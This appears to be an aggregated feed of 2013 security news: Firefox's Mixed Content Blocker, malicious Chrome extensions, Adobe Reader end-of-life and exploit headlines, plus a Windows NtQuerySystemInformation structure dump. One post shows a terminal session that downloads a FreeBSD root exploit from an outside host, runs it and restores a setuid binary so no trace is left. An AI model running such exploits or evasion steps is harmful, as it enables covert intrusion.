Buherator
Shared posts
Unix Guru Evi Nemeth Missing, Feared Lost At Sea
Read more of this story at Slashdot.
Mixed Content Blocker hits Firefox Beta!
The Mixed Content Blocker we described last month is now available in Firefox Beta and is on track for a general release in August with Firefox 23. When secure HTTPS pages load additional content insecurely over HTTP (a.k.a. Mixed Content), users are vulnerable to man-in-the-middle and eavesdropping attacks. The Mixed Content Blocker will block insecure active content by default, protecting our users from these attacks.
Call to Users – Report problems
If you find a website that isn’t functioning correctly because it contains insecure content that is being blocked by the Mixed Content Blocker, please let us know by sending an email to security@mozilla.org or commenting in our compatibility tracking bug.
How can you tell if a site has Mixed Content that Firefox has blocked? Look for this Shield Icon in the location bar.
If you’d like to contribute further and help us find compatibility issues you can participate in our QA test day on Monday, July 1st.
Call to Web Developers – Test your site with Firefox Beta
If you rely on HTTP resources in your HTTPS pages this feature might break your website. If you do find Mixed Content issues on your webpage in Firefox 23+, chances are that the same issues exist in Chrome and/or Internet Explorer, which have also implemented this feature.
The best way to tell if your site will load correctly in Firefox 23 is to download the latest Firefox Beta and browse through your website with the Web Console open. Enable the “Security” messages in Web Console and check for messages about Mixed Content.
If you want to test your site in a more automated fashion, you can try using Skipfish, a web application security tool. Skipfish has a -M option that will report mixed content issues on your webpage.
To fix your site, simply replace http:// links with their https:// equivalents on your SSL pages. You can also use protocol-relative links if you use the same source code to serve your HTTP and HTTPS website.
If the Mixed Content resources on your page come from a third party, there is a chance that the HTTPS equivalent version already exists. For example, youtube.com has both HTTP and HTTPS video embed options. If the HTTPS version does not exist, consider contacting the third party (especially if they are one of your partners) and ask them to provide an HTTPS version of the content.
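As an added example, not code from the Mozilla post, the following Python script performs the same check offline on a page's HTML: it lists every HTTP-scheme URL loaded from an HTTPS page, separates active content (scripts, stylesheets, frames, plugins, which Firefox 23 blocks) from passive content (images and media, which only trigger the shield icon), and shows the two fixes the post recommends, rewriting to https:// or to protocol-relative links. The tag-to-category table is this example's own simplification, and the sample page and its example.test hostnames are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
import re

# Tag/attribute pairs that fetch sub-resources, split into the "active" kind
# (executed or rendered as code) and the "passive" kind (images, media).
# Simplified categorisation for this example; <a href> is navigation, not a
# sub-resource load, so it is deliberately absent.
LOADERS = {("script", "src"): "active", ("iframe", "src"): "active",
           ("link", "href"): "active", ("object", "data"): "active",
           ("embed", "src"): "active",
           ("img", "src"): "passive", ("audio", "src"): "passive",
           ("video", "src"): "passive", ("source", "src"): "passive"}


class MixedContentFinder(HTMLParser):
    """Collects (kind, tag, url) for every http:// sub-resource reference."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for (t, a), kind in LOADERS.items():
            if tag != t or not attrs.get(a):
                continue
            # Only stylesheet <link>s are fetched as active content here.
            if t == "link" and (attrs.get("rel") or "").lower() != "stylesheet":
                continue
            if urlsplit(attrs[a]).scheme.lower() == "http":
                self.findings.append((kind, tag, attrs[a]))


def find_mixed_content(html):
    """Return the mixed-content findings for one HTML document."""
    parser = MixedContentFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


def rewrite_to_https(html, protocol_relative=False):
    """Rewrite http:// in src/href/data attributes to https:// (default) or to
    a protocol-relative //host/path, for markup shared by the HTTP and HTTPS
    versions of a site."""
    repl = "//" if protocol_relative else "https://"
    return re.sub(r'((?:src|href|data)\s*=\s*["\'])http://',
                  lambda m: m.group(1) + repl, html, flags=re.IGNORECASE)


# Constructed sample page: one stylesheet, two scripts, an image and a
# third-party embed, mixing http:// and https:// references.
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="http://cdn.example.test/site.css">
<script src="https://cdn.example.test/app.js"></script>
<script src="http://analytics.example.test/track.js"></script>
</head><body>
<img src="http://img.example.test/logo.png">
<iframe src="http://www.youtube.com/embed/PLACEHOLDER_ID"></iframe>
<a href="http://example.test/about">About</a>
</body></html>"""

if __name__ == "__main__":
    for kind, tag, url in find_mixed_content(SAMPLE_PAGE):
        print("%-7s <%s> %s" % (kind, tag, url))
    print("after rewrite:", find_mixed_content(rewrite_to_https(SAMPLE_PAGE)))
```

Run it against saved copies of your HTTPS pages; anything reported as active is what Firefox 23 will block outright, and a second pass over the output of rewrite_to_https confirms the page is clean. The rewrite is textual and assumes each HTTP resource is also served over HTTPS at the same path, which is exactly what must be verified per third party as the post describes.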
Call to Contributors – Contact Sites
We’ve been working on site compatibility issues, trying to find websites that are affected by the Mixed Content Blocker and alert them before Firefox 23 is released in August. However, finding accurate contact information for the affected sites has been a difficult task. And we could really use some help!
If you would like to contribute, please take a look at the list of affected sites and see if you can contact their website administrators and inform them of the Mixed Content compatibility issues that they are about to run into with Firefox 23 (and likely already have with Chrome or Internet Explorer). If you are able to find contact information and/or alert the website please let us know in the associated bug.
You can also help find more affected sites by participating in our QA test day on Monday, July 1st.
Want to Learn More?
Check out a more detailed blog post on this feature here.
Meet PRISM's English Little Brother: Socmint
Read more of this story at Slashdot.
[local] - FreeBSD 9 Address Space Manipulation Privilege Escalation
[local] - ZPanel zsudo Local Privilege Escalation Exploit
[local] - Novell Client 2 SP3 nicm.sys Local Privilege Escalation
Chrome Web Store Apps Now Automatically Scanned
Google has started to scan newly uploaded applications and extensions in its Chrome Web Store, similar to what they already do in the Android Play Market.
We have written about quite a few cases where malicious extensions were pushed on social network users. Usually they claim to add a new functionality to the social network, like seeing who visited your profile. Not all of them are hosted on the official Chrome Web Store, so the new process will not stop all malicious extensions finding their way to the user. That being said, Symantec welcomes Google’s effort to remove malicious Chrome extensions as soon as possible and the improvements that were made to their automated system to help them detect items containing malware.
Malicious extensions for browsers are quite powerful. Once the user installs an extension and grants it permission, it can perform malicious tasks from within the browser. This can lead to man-in-the-browser (MITB) attacks with financial Trojans such as Zeus, swapping Web content, stealing passwords from login forms, or performing click-fraud in the background. At the moment, these malicious extensions are very popular with social networks scams. We wrote about the danger of malware in Firefox extensions in 2009 and this can also apply to Chrome extensions.

Figure 1. Malicious browser extension claiming additional feature
Regarding the malicious extensions that are being pushed on social media, be cautious when you see offers for free products on social networks, especially products that are highly sought after. If a feature is not currently available on a social network, chances are there is a reason that it is not available. Do not install browser extensions from unverified sources, even if they offer free products or access to an unavailable feature, and be especially suspicious of anything that is promoted aggressively on your social networks.
HP Confirms Backdoor In StoreOnce Backup Products
Read more of this story at Slashdot.
Reader 9.x Reaches End-of-Life
In line with the Adobe Support Lifecycle Policy, Adobe’s Acrobat 9.x and Reader 9.x suite of products reached their end-of-life (EOL) today, June 26, 2013. This means that Adobe will no longer provide security or other updates to this product suite.
Over the years, we’ve made several security enhancements in the successors of Reader 9, Reader X and Reader XI, including the Protected Mode (aka “sandboxing”) and Protected View. There has never been a better time to upgrade to Reader XI. Please upgrade, ensure automatic updates are turned on, and stay secure!
Karthik Raman
Security Researcher, ASSET
Opera breached, has code cert stolen, possibly spreads malware - advice on what to do
[remote] - HP System Management Homepage JustGetSNMPQueue Command Injection
[local] - Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation
[remote] - ZPanel 10.0.0.2 htpasswd Module Username Command Execution
FreeBSD 9.{0,1} mmap/ptrace exploit V2: Clean-up version (no backdoor left)
The original exploit usually left the suid root binary used for the attack in a modified state, so afterwards it always gave root right away and no longer performed its original function. This can be noticed by operators and can be caught by a hash check, which is why this new version restores the original state so that no trace is left... :)
$ uname -a
FreeBSD fbsd91x64 9.1-STABLE #8: Wed Jun 18 10:32:07 CEST 2013
root@fbsd91x64:/usr/src/sys/amd64/compile/STABLE amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ ftp -V http://hunger.hu/fbsd9lul2.c
$ gcc fbsd9lul2.c -o fbsd9lul2
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ ./fbsd9lul2
FreeBSD 9.{0,1} mmap/ptrace exploit V2
Clean-up version (no backdoor left)
by Hunger <fbsd9lul@hunger.hu>
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# exit
$ ls -la /sbin/ping
-r-sr-xr-x 1 root wheel 28008 Dec 4 2012 ping
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ /sbin/ping
usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
...
.biz DNSSEC DNSKEY is Invalid, (Sat, Jun 22nd)
We have received indication that the domain .biz DNSSEC DNSKEY is "bogus ...(more)...
Undocumented NtQuerySystemInformation Structures (Updated for Windows 8)
enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation=0x0000,
SystemProcessorInformation=0x0001,
SystemPerformanceInformation=0x0002,
SystemTimeOfDayInformation=0x0003,
SystemPathInformation=0x0004,
SystemProcessInformation=0x0005,
SystemCallCountInformation=0x0006,
SystemDeviceInformation=0x0007,
SystemProcessorPerformanceInformation=0x0008,
SystemFlagsInformation=0x0009,
SystemCallTimeInformation=0x000A,
SystemModuleInformation=0x000B,
SystemLocksInformation=0x000C,
SystemStackTraceInformation=0x000D,
SystemPagedPoolInformation=0x000E,
SystemNonPagedPoolInformation=0x000F,
SystemHandleInformation=0x0010,
SystemObjectInformation=0x0011,
SystemPageFileInformation=0x0012,
SystemVdmInstemulInformation=0x0013,
SystemVdmBopInformation=0x0014,
SystemFileCacheInformation=0x0015,
SystemPoolTagInformation=0x0016,
SystemInterruptInformation=0x0017,
SystemDpcBehaviorInformation=0x0018,
SystemFullMemoryInformation=0x0019,
SystemLoadGdiDriverInformation=0x001A,
SystemUnloadGdiDriverInformation=0x001B,
SystemTimeAdjustmentInformation=0x001C,
SystemSummaryMemoryInformation=0x001D,
SystemMirrorMemoryInformation=0x001E,
SystemPerformanceTraceInformation=0x001F,
SystemCrashDumpInformation=0x0020,
SystemExceptionInformation=0x0021,
SystemCrashDumpStateInformation=0x0022,
SystemKernelDebuggerInformation=0x0023,
SystemContextSwitchInformation=0x0024,
SystemRegistryQuotaInformation=0x0025,
SystemExtendServiceTableInformation=0x0026,
SystemPrioritySeperation=0x0027,
SystemVerifierAddDriverInformation=0x0028,
SystemVerifierRemoveDriverInformation=0x0029,
SystemProcessorIdleInformation=0x002A,
SystemLegacyDriverInformation=0x002B,
SystemCurrentTimeZoneInformation=0x002C,
SystemLookasideInformation=0x002D,
SystemTimeSlipNotification=0x002E,
SystemSessionCreate=0x002F,
SystemSessionDetach=0x0030,
SystemSessionInformation=0x0031,
SystemRangeStartInformation=0x0032,
SystemVerifierInformation=0x0033,
SystemVerifierThunkExtend=0x0034,
SystemSessionProcessInformation=0x0035,
SystemLoadGdiDriverInSystemSpace=0x0036,
SystemNumaProcessorMap=0x0037,
SystemPrefetcherInformation=0x0038,
SystemExtendedProcessInformation=0x0039,
SystemRecommendedSharedDataAlignment=0x003A,
SystemComPlusPackage=0x003B,
SystemNumaAvailableMemory=0x003C,
SystemProcessorPowerInformation=0x003D,
SystemEmulationBasicInformation=0x003E,
SystemEmulationProcessorInformation=0x003F,
SystemExtendedHandleInformation=0x0040,
SystemLostDelayedWriteInformation=0x0041,
SystemBigPoolInformation=0x0042,
SystemSessionPoolTagInformation=0x0043,
SystemSessionMappedViewInformation=0x0044,
SystemHotpatchInformation=0x0045,
SystemObjectSecurityMode=0x0046,
SystemWatchdogTimerHandler=0x0047,
SystemWatchdogTimerInformation=0x0048,
SystemLogicalProcessorInformation=0x0049,
SystemWow64SharedInformationObsolete=0x004A,
SystemRegisterFirmwareTableInformationHandler=0x004B,
SystemFirmwareTableInformation=0x004C,
SystemModuleInformationEx=0x004D,
SystemVerifierTriageInformation=0x004E,
SystemSuperfetchInformation=0x004F,
SystemMemoryListInformation=0x0050,
SystemFileCacheInformationEx=0x0051,
SystemThreadPriorityClientIdInformation=0x0052,
SystemProcessorIdleCycleTimeInformation=0x0053,
SystemVerifierCancellationInformation=0x0054,
SystemProcessorPowerInformationEx=0x0055,
SystemRefTraceInformation=0x0056,
SystemSpecialPoolInformation=0x0057,
SystemProcessIdInformation=0x0058,
SystemErrorPortInformation=0x0059,
SystemBootEnvironmentInformation=0x005A,
SystemHypervisorInformation=0x005B,
SystemVerifierInformationEx=0x005C,
SystemTimeZoneInformation=0x005D,
SystemImageFileExecutionOptionsInformation=0x005E,
SystemCoverageInformation=0x005F,
SystemPrefetchPatchInformation=0x0060,
SystemVerifierFaultsInformation=0x0061,
SystemSystemPartitionInformation=0x0062,
SystemSystemDiskInformation=0x0063,
SystemProcessorPerformanceDistribution=0x0064,
SystemNumaProximityNodeInformation=0x0065,
SystemDynamicTimeZoneInformation=0x0066,
SystemCodeIntegrityInformation=0x0067,
SystemProcessorMicrocodeUpdateInformation=0x0068,
SystemProcessorBrandString=0x0069,
SystemVirtualAddressInformation=0x006A,
SystemLogicalProcessorAndGroupInformation=0x006B,
SystemProcessorCycleTimeInformation=0x006C,
SystemStoreInformation=0x006D,
SystemRegistryAppendString=0x006E,
SystemAitSamplingValue=0x006F,
SystemVhdBootInformation=0x0070,
SystemCpuQuotaInformation=0x0071,
SystemNativeBasicInformation=0x0072,
SystemErrorPortTimeouts=0x0073,
SystemLowPriorityIoInformation=0x0074,
SystemBootEntropyInformation=0x0075,
SystemVerifierCountersInformation=0x0076,
SystemPagedPoolInformationEx=0x0077,
SystemSystemPtesInformationEx=0x0078,
SystemNodeDistanceInformation=0x0079,
SystemAcpiAuditInformation=0x007A,
SystemBasicPerformanceInformation=0x007B,
SystemQueryPerformanceCounterInformation=0x007C,
SystemSessionBigPoolInformation=0x007D,
SystemBootGraphicsInformation=0x007E,
SystemScrubPhysicalMemoryInformation=0x007F,
SystemBadPageInformation=0x0080,
SystemProcessorProfileControlArea=0x0081,
SystemCombinePhysicalMemoryInformation=0x0082,
SystemEntropyInterruptTimingInformation=0x0083,
SystemConsoleInformation=0x0084,
SystemPlatformBinaryInformation=0x0085,
SystemThrottleNotificationInformation=0x0086,
SystemHypervisorProcessorCountInformation=0x0087,
SystemDeviceDataInformation=0x0088,
SystemDeviceDataEnumerationInformation=0x0089,
SystemMemoryTopologyInformation=0x008A,
SystemMemoryChannelInformation=0x008B,
SystemBootLogoInformation=0x008C,
SystemProcessorPerformanceInformationEx=0x008D,
SystemSpare0=0x008E,
SystemSecureBootPolicyInformation=0x008F,
SystemPageFileInformationEx=0x0090,
SystemSecureBootInformation=0x0091,
SystemEntropyInterruptTimingRawInformation=0x0092,
SystemPortableWorkspaceEfiLauncherInformation=0x0093,
SystemFullProcessInformation=0x0094,
MaxSystemInfoClass=0x0095
};
typedef unsigned short USHORT, *USHORT_PTR;
typedef PVOID HANDLE;
typedef struct _UNICODE_STRING // Size=8
{
USHORT Length; // Size=2 Offset=0
USHORT MaximumLength; // Size=2 Offset=2
USHORT_PTR Buffer; // Size=4 Offset=4
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _LARGE_INTEGER // Size=8
{
ULONG LowPart; // Size=4 Offset=0
LONG HighPart; // Size=4 Offset=4
} LARGE_INTEGER;
typedef struct _GENERIC_MAPPING // Size=16
{
ULONG GenericRead; // Size=4 Offset=0
ULONG GenericWrite; // Size=4 Offset=4
ULONG GenericExecute; // Size=4 Offset=8
ULONG GenericAll; // Size=4 Offset=12
} GENERIC_MAPPING;
struct _SYSTEM_BASIC_INFORMATION // Size=44
{
ULONG Reserved; // Size=4 Offset=0
ULONG TimerResolution; // Size=4 Offset=4
ULONG PageSize; // Size=4 Offset=8
ULONG NumberOfPhysicalPages; // Size=4 Offset=12
ULONG LowestPhysicalPageNumber; // Size=4 Offset=16
ULONG HighestPhysicalPageNumber; // Size=4 Offset=20
ULONG AllocationGranularity; // Size=4 Offset=24
ULONG MinimumUserModeAddress; // Size=4 Offset=28
ULONG MaximumUserModeAddress; // Size=4 Offset=32
ULONG ActiveProcessorsAffinityMask; // Size=4 Offset=36
UCHAR NumberOfProcessors; // Size=1 Offset=40
};
struct _SYSTEM_PROCESSOR_INFORMATION // Size=12
{
USHORT ProcessorArchitecture; // Size=2 Offset=0
USHORT ProcessorLevel; // Size=2 Offset=2
USHORT ProcessorRevision; // Size=2 Offset=4
USHORT MaximumProcessors; // Size=2 Offset=6
ULONG ProcessorFeatureBits; // Size=4 Offset=8
};
struct _SYSTEM_PERFORMANCE_INFORMATION // Size=344
{
LARGE_INTEGER IdleProcessTime; // Size=8 Offset=0
LARGE_INTEGER IoReadTransferCount; // Size=8 Offset=8
LARGE_INTEGER IoWriteTransferCount; // Size=8 Offset=16
LARGE_INTEGER IoOtherTransferCount; // Size=8 Offset=24
ULONG IoReadOperationCount; // Size=4 Offset=32
ULONG IoWriteOperationCount; // Size=4 Offset=36
ULONG IoOtherOperationCount; // Size=4 Offset=40
ULONG AvailablePages; // Size=4 Offset=44
ULONG CommittedPages; // Size=4 Offset=48
ULONG CommitLimit; // Size=4 Offset=52
ULONG PeakCommitment; // Size=4 Offset=56
ULONG PageFaultCount; // Size=4 Offset=60
ULONG CopyOnWriteCount; // Size=4 Offset=64
ULONG TransitionCount; // Size=4 Offset=68
ULONG CacheTransitionCount; // Size=4 Offset=72
ULONG DemandZeroCount; // Size=4 Offset=76
ULONG PageReadCount; // Size=4 Offset=80
ULONG PageReadIoCount; // Size=4 Offset=84
ULONG CacheReadCount; // Size=4 Offset=88
ULONG CacheIoCount; // Size=4 Offset=92
ULONG DirtyPagesWriteCount; // Size=4 Offset=96
ULONG DirtyWriteIoCount; // Size=4 Offset=100
ULONG MappedPagesWriteCount; // Size=4 Offset=104
ULONG MappedWriteIoCount; // Size=4 Offset=108
ULONG PagedPoolPages; // Size=4 Offset=112
ULONG NonPagedPoolPages; // Size=4 Offset=116
ULONG PagedPoolAllocs; // Size=4 Offset=120
ULONG PagedPoolFrees; // Size=4 Offset=124
ULONG NonPagedPoolAllocs; // Size=4 Offset=128
ULONG NonPagedPoolFrees; // Size=4 Offset=132
ULONG FreeSystemPtes; // Size=4 Offset=136
ULONG ResidentSystemCodePage; // Size=4 Offset=140
ULONG TotalSystemDriverPages; // Size=4 Offset=144
ULONG TotalSystemCodePages; // Size=4 Offset=148
ULONG NonPagedPoolLookasideHits; // Size=4 Offset=152
ULONG PagedPoolLookasideHits; // Size=4 Offset=156
ULONG AvailablePagedPoolPages; // Size=4 Offset=160
ULONG ResidentSystemCachePage; // Size=4 Offset=164
ULONG ResidentPagedPoolPage; // Size=4 Offset=168
ULONG ResidentSystemDriverPage; // Size=4 Offset=172
ULONG CcFastReadNoWait; // Size=4 Offset=176
ULONG CcFastReadWait; // Size=4 Offset=180
ULONG CcFastReadResourceMiss; // Size=4 Offset=184
ULONG CcFastReadNotPossible; // Size=4 Offset=188
ULONG CcFastMdlReadNoWait; // Size=4 Offset=192
ULONG CcFastMdlReadWait; // Size=4 Offset=196
ULONG CcFastMdlReadResourceMiss; // Size=4 Offset=200
ULONG CcFastMdlReadNotPossible; // Size=4 Offset=204
ULONG CcMapDataNoWait; // Size=4 Offset=208
ULONG CcMapDataWait; // Size=4 Offset=212
ULONG CcMapDataNoWaitMiss; // Size=4 Offset=216
ULONG CcMapDataWaitMiss; // Size=4 Offset=220
ULONG CcPinMappedDataCount; // Size=4 Offset=224
ULONG CcPinReadNoWait; // Size=4 Offset=228
ULONG CcPinReadWait; // Size=4 Offset=232
ULONG CcPinReadNoWaitMiss; // Size=4 Offset=236
ULONG CcPinReadWaitMiss; // Size=4 Offset=240
ULONG CcCopyReadNoWait; // Size=4 Offset=244
ULONG CcCopyReadWait; // Size=4 Offset=248
ULONG CcCopyReadNoWaitMiss; // Size=4 Offset=252
ULONG CcCopyReadWaitMiss; // Size=4 Offset=256
ULONG CcMdlReadNoWait; // Size=4 Offset=260
ULONG CcMdlReadWait; // Size=4 Offset=264
ULONG CcMdlReadNoWaitMiss; // Size=4 Offset=268
ULONG CcMdlReadWaitMiss; // Size=4 Offset=272
ULONG CcReadAheadIos; // Size=4 Offset=276
ULONG CcLazyWriteIos; // Size=4 Offset=280
ULONG CcLazyWritePages; // Size=4 Offset=284
ULONG CcDataFlushes; // Size=4 Offset=288
ULONG CcDataPages; // Size=4 Offset=292
ULONG ContextSwitches; // Size=4 Offset=296
ULONG FirstLevelTbFills; // Size=4 Offset=300
ULONG SecondLevelTbFills; // Size=4 Offset=304
ULONG SystemCalls; // Size=4 Offset=308
ULONGLONG CcTotalDirtyPages; // Size=8 Offset=312
ULONGLONG CcDirtyPageThreshold; // Size=8 Offset=320
LONGLONG ResidentAvailablePages; // Size=8 Offset=328
ULONGLONG SharedCommittedPages; // Size=8 Offset=336
};
struct _SYSTEM_TIMEOFDAY_INFORMATION // Size=48
{
LARGE_INTEGER BootTime; // Size=8 Offset=0
LARGE_INTEGER CurrentTime; // Size=8 Offset=8
LARGE_INTEGER TimeZoneBias; // Size=8 Offset=16
ULONG TimeZoneId; // Size=4 Offset=24
ULONG Reserved; // Size=4 Offset=28
ULONGLONG BootTimeBias; // Size=8 Offset=32
ULONGLONG SleepTimeBias; // Size=8 Offset=40
};
typedef struct _SYSTEM_PROCESS_INFORMATION // Size=184
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG NumberOfThreads; // Size=4 Offset=4
LARGE_INTEGER WorkingSetPrivateSize; // Size=8 Offset=8
ULONG HardFaultCount; // Size=4 Offset=16
ULONG NumberOfThreadsHighWatermark; // Size=4 Offset=20
ULONGLONG CycleTime; // Size=8 Offset=24
LARGE_INTEGER CreateTime; // Size=8 Offset=32
LARGE_INTEGER UserTime; // Size=8 Offset=40
LARGE_INTEGER KernelTime; // Size=8 Offset=48
UNICODE_STRING ImageName; // Size=8 Offset=56
LONG BasePriority; // Size=4 Offset=64
PVOID UniqueProcessId; // Size=4 Offset=68
PVOID InheritedFromUniqueProcessId; // Size=4 Offset=72
ULONG HandleCount; // Size=4 Offset=76
ULONG SessionId; // Size=4 Offset=80
ULONG UniqueProcessKey; // Size=4 Offset=84
ULONG PeakVirtualSize; // Size=4 Offset=88
ULONG VirtualSize; // Size=4 Offset=92
ULONG PageFaultCount; // Size=4 Offset=96
ULONG PeakWorkingSetSize; // Size=4 Offset=100
ULONG WorkingSetSize; // Size=4 Offset=104
ULONG QuotaPeakPagedPoolUsage; // Size=4 Offset=108
ULONG QuotaPagedPoolUsage; // Size=4 Offset=112
ULONG QuotaPeakNonPagedPoolUsage; // Size=4 Offset=116
ULONG QuotaNonPagedPoolUsage; // Size=4 Offset=120
ULONG PagefileUsage; // Size=4 Offset=124
ULONG PeakPagefileUsage; // Size=4 Offset=128
ULONG PrivatePageCount; // Size=4 Offset=132
LARGE_INTEGER ReadOperationCount; // Size=8 Offset=136
LARGE_INTEGER WriteOperationCount; // Size=8 Offset=144
LARGE_INTEGER OtherOperationCount; // Size=8 Offset=152
LARGE_INTEGER ReadTransferCount; // Size=8 Offset=160
LARGE_INTEGER WriteTransferCount; // Size=8 Offset=168
LARGE_INTEGER OtherTransferCount; // Size=8 Offset=176
} SYSTEM_PROCESS_INFORMATION;
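As an added example, not part of the structure dump above, here is a Python parser for a SystemProcessInformation buffer laid out as the 32-bit SYSTEM_PROCESS_INFORMATION just listed. It walks the NextEntryOffset-linked list the way a forensic tool would over a captured buffer, rebases the absolute ImageName.Buffer pointers against the address the buffer was returned at, and refuses to read past the end or loop forever on a corrupted or tampered list. The buffer, the base address 0x00A40000, the process names and all counters are constructed for the demonstration; only the fields up to UniqueProcessKey are unpacked, and the thread records that in a real buffer sit between the header and the next entry are covered by NextEntryOffset and therefore not needed here.

```python
import struct

# Leading fields of the 32-bit SYSTEM_PROCESS_INFORMATION, as in the dump:
# NextEntryOffset, NumberOfThreads, WorkingSetPrivateSize, HardFaultCount,
# NumberOfThreadsHighWatermark, CycleTime, CreateTime, UserTime, KernelTime,
# ImageName (Length, MaximumLength, Buffer), BasePriority, UniqueProcessId,
# InheritedFromUniqueProcessId, HandleCount, SessionId, UniqueProcessKey.
PROCESS_HEADER_FMT = "<IIqIIQqqqHHIiIIIII"
PROCESS_HEADER_SIZE = 184            # Size=184 from the structure dump
assert struct.calcsize(PROCESS_HEADER_FMT) == 88   # offset of PeakVirtualSize


def parse_process_list(buf, base_addr):
    """Walk the NextEntryOffset-linked entries in a raw query buffer.

    base_addr is the virtual address the buffer occupied in the querying
    process; UNICODE_STRING.Buffer holds absolute pointers into it."""
    entries = []
    off = 0
    while True:
        if off + PROCESS_HEADER_SIZE > len(buf):
            raise ValueError("entry header at offset %d runs past the buffer" % off)
        (next_off, nthreads, _wsps, _hf, _hwm, _cycle, create, _ut, _kt,
         name_len, name_max, name_ptr, base_prio, pid, ppid,
         handles, session, _key) = struct.unpack_from(PROCESS_HEADER_FMT, buf, off)
        if name_len == 0:
            name = ""                    # the idle process carries no image name
        else:
            rel = name_ptr - base_addr
            if rel < 0 or rel + name_len > len(buf) or name_len > name_max:
                raise ValueError("ImageName of entry at %d points outside the buffer" % off)
            name = buf[rel:rel + name_len].decode("utf-16-le")
        entries.append({"pid": pid, "ppid": ppid, "name": name, "threads": nthreads,
                        "handles": handles, "session": session,
                        "base_priority": base_prio, "create_time": create})
        if next_off == 0:
            break                        # NextEntryOffset == 0 marks the last entry
        if next_off < PROCESS_HEADER_SIZE:
            raise ValueError("NextEntryOffset %d too small at %d" % (next_off, off))
        off += next_off                  # strictly increasing, so no cycles
    return entries


def is_well_formed(buf, base_addr):
    """True when the whole list can be walked without leaving the buffer."""
    try:
        parse_process_list(buf, base_addr)
        return True
    except ValueError:
        return False


def orphaned_processes(entries):
    """Names whose parent pid is absent from the snapshot: the parent exited,
    or the list is incomplete. A triage hint, not proof of anything."""
    pids = {e["pid"] for e in entries}
    return [e["name"] for e in entries if e["ppid"] not in pids and e["pid"] != 0]


def _encode_entry(pid, ppid, name, threads, session, base_addr, entry_off, last):
    """Serialise one constructed entry; the image name follows the header."""
    name_bytes = name.encode("utf-16-le")
    total = PROCESS_HEADER_SIZE + len(name_bytes)
    total += (-total) % 8                # keep entries 8-byte aligned
    header = struct.pack(PROCESS_HEADER_FMT,
                         0 if last else total, threads, 0, 0, threads, 0,
                         0x01CE70F0C0000000 + pid, 0, 0,     # made-up CreateTime
                         len(name_bytes), len(name_bytes) + 2 if name_bytes else 0,
                         base_addr + entry_off + PROCESS_HEADER_SIZE if name_bytes else 0,
                         8, pid, ppid, 16 * threads, session, 0)
    return (header.ljust(PROCESS_HEADER_SIZE, b"\0") + name_bytes).ljust(total, b"\0")


CONSTRUCTED_BASE = 0x00A40000            # pretend address of the returned buffer


def build_sample_buffer(base_addr=CONSTRUCTED_BASE):
    """Four constructed entries; the last one has a parent missing from the list."""
    procs = [(0, 0, "", 4, 0), (4, 0, "System", 120, 0),
             (300, 4, "smss.exe", 2, 0), (1234, 999, "example.exe", 3, 1)]
    buf = b""
    for i, (pid, ppid, name, threads, session) in enumerate(procs):
        buf += _encode_entry(pid, ppid, name, threads, session, base_addr,
                             len(buf), last=(i == len(procs) - 1))
    return buf


if __name__ == "__main__":
    buf = build_sample_buffer()
    entries = parse_process_list(buf, CONSTRUCTED_BASE)
    for e in entries:
        print("%5d %5d %-12s threads=%d" % (e["pid"], e["ppid"], e["name"], e["threads"]))
    print("orphans:", orphaned_processes(entries))
```

The same pattern (fixed header, NextEntryOffset, bounds check before every read) applies to the other variable-length lists in this dump, such as SYSTEM_PAGEFILE_INFORMATION and SYSTEM_OBJECT_INFORMATION; on 64-bit Windows the pointer-sized fields widen and the offsets change, so the format string must be regenerated from the matching layout rather than reused.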
struct _SYSTEM_CALL_COUNT_INFORMATION // Size=8
{
ULONG Length; // Size=4 Offset=0
ULONG NumberOfTables; // Size=4 Offset=4
};
struct _SYSTEM_DEVICE_INFORMATION // Size=24
{
ULONG NumberOfDisks; // Size=4 Offset=0
ULONG NumberOfFloppies; // Size=4 Offset=4
ULONG NumberOfCdRoms; // Size=4 Offset=8
ULONG NumberOfTapes; // Size=4 Offset=12
ULONG NumberOfSerialPorts; // Size=4 Offset=16
ULONG NumberOfParallelPorts; // Size=4 Offset=20
};
struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION // Size=48
{
LARGE_INTEGER IdleTime; // Size=8 Offset=0
LARGE_INTEGER KernelTime; // Size=8 Offset=8
LARGE_INTEGER UserTime; // Size=8 Offset=16
LARGE_INTEGER DpcTime; // Size=8 Offset=24
LARGE_INTEGER InterruptTime; // Size=8 Offset=32
ULONG InterruptCount; // Size=4 Offset=40
};
typedef enum _SYSTEM_GLOBAL_FLAGS
{
FLG_DISABLE_DBGPRINT=0x08000000,
FLG_KERNEL_STACK_TRACE_DB=0x00002000,
FLG_USER_STACK_TRACE_DB=0x00001000,
FLG_DEBUG_INITIAL_COMMAND=0x00000004,
FLG_DEBUG_INITIAL_COMMAND_EX=0x04000000,
FLG_HEAP_DISABLE_COALESCING=0x00200000,
FLG_DISABLE_PAGE_KERNEL_STACKS=0x00080000,
FLG_DISABLE_PROTDLLS=0x80000000,
FLG_DISABLE_STACK_EXTENSION=0x00010000,
FLG_CRITSEC_EVENT_CREATION=0x10000000,
FLG_APPLICATION_VERIFIER=0x00000100,
FLG_ENABLE_HANDLE_EXCEPTIONS=0x40000000,
FLG_ENABLE_CLOSE_EXCEPTIONS=0x00400000,
FLG_ENABLE_CSRDEBUG=0x00020000,
FLG_ENABLE_EXCEPTION_LOGGING=0x00800000,
FLG_HEAP_ENABLE_FREE_CHECK=0x00000020,
FLG_HEAP_VALIDATE_PARAMETERS=0x00000040,
FLG_HEAP_ENABLE_TAGGING=0x00000800,
FLG_HEAP_ENABLE_TAG_BY_DLL=0x00008000,
FLG_HEAP_ENABLE_TAIL_CHECK=0x00000010,
FLG_HEAP_VALIDATE_ALL=0x00000080,
